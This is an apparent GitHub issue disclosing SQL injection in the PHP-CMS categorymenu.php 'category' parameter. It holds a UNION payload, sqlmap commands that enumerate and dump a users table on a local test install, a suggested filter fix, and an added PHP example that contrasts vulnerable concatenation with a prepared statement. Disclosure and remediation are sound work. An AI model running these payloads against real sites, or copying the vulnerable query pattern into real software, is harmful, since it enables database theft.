SQL injection in categorymenu page #14
Comments
Multiple SQLi STATUS Critical! =) Dude, you must delete this project, please! What kind of web developer are you? 😲 Infected
How to fix it? Could you please provide a patch?
I will help you as soon as I can :)
@nu11secur1ty This is an interesting vulnerability with academic research significance. I look forward to your patch. Thank you.
Description
I found a SQL injection vulnerability in the page categorymenu.php and I built a local environment to test it.
The URL is http://127.0.0.1/PHP-CMS/categorymenu.php
The problem code is here.
Users can control the parameter "category" via the GET method without any filter, and get something that shouldn't have been queried. For example, if "category" is changed to "-1 union select 1,2,user(),4,5,6,7,8,9,10,11", you will get the database user:
Proof
I used sqlmap to do this.
1. Get database information.
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 --dbs
2. Select a database and get table information.
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms --tables
3. Select a table and get the columns.
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users --columns
4. Select the columns and get column contents.
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users -C username --dump
Solution
You can fix it by adding some filter rules on the parameter "category", such as banning letter characters.
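
One way to apply the fix suggested above, shown beside the vulnerable pattern. This is an added example, not part of the original issue and not PHP-CMS's own code. The schema, the function names and the in-memory SQLite database are assumptions made so it runs offline (it needs the pdo_sqlite extension); against MySQL the same prepared-statement code applies with a different DSN.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the CMS database (hypothetical schema), in-memory SQLite.
function demoDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, category_id INTEGER, title TEXT)');
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)');
    $pdo->exec("INSERT INTO posts (category_id, title) VALUES (1, 'Hello'), (2, 'News')");
    $pdo->exec("INSERT INTO users (username) VALUES ('admin')");
    return $pdo;
}

// Vulnerable pattern the issue describes: the request value is concatenated into SQL,
// so the value can change the structure of the query.
function postsUnsafe(PDO $pdo, string $category): array {
    $sql = "SELECT id, title FROM posts WHERE category_id = $category";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: strict integer validation (the "filter rule"), then a bound parameter
// so the value is never parsed as SQL even if validation is later loosened.
function postsSafe(PDO $pdo, string $category): array {
    $id = filter_var($category, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // reject anything that is not a positive integer
    }
    $stmt = $pdo->prepare('SELECT id, title FROM posts WHERE category_id = :cat');
    $stmt->bindValue(':cat', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = demoDb();
// Constructed input with the same shape as the value quoted in the issue.
$payload = '-1 UNION SELECT id, username FROM users';

echo "unsafe, crafted input:\n";
print_r(postsUnsafe($pdo, $payload)); // rows come from the users table
echo "safe, crafted input:\n";
print_r(postsSafe($pdo, $payload));   // rejected by validation
echo "safe, normal input:\n";
print_r(postsSafe($pdo, '1'));        // posts in category 1 only
```

Validation alone (for example, banning letters) is a filter that can be bypassed or forgotten on another parameter; the bound parameter is what removes the injection.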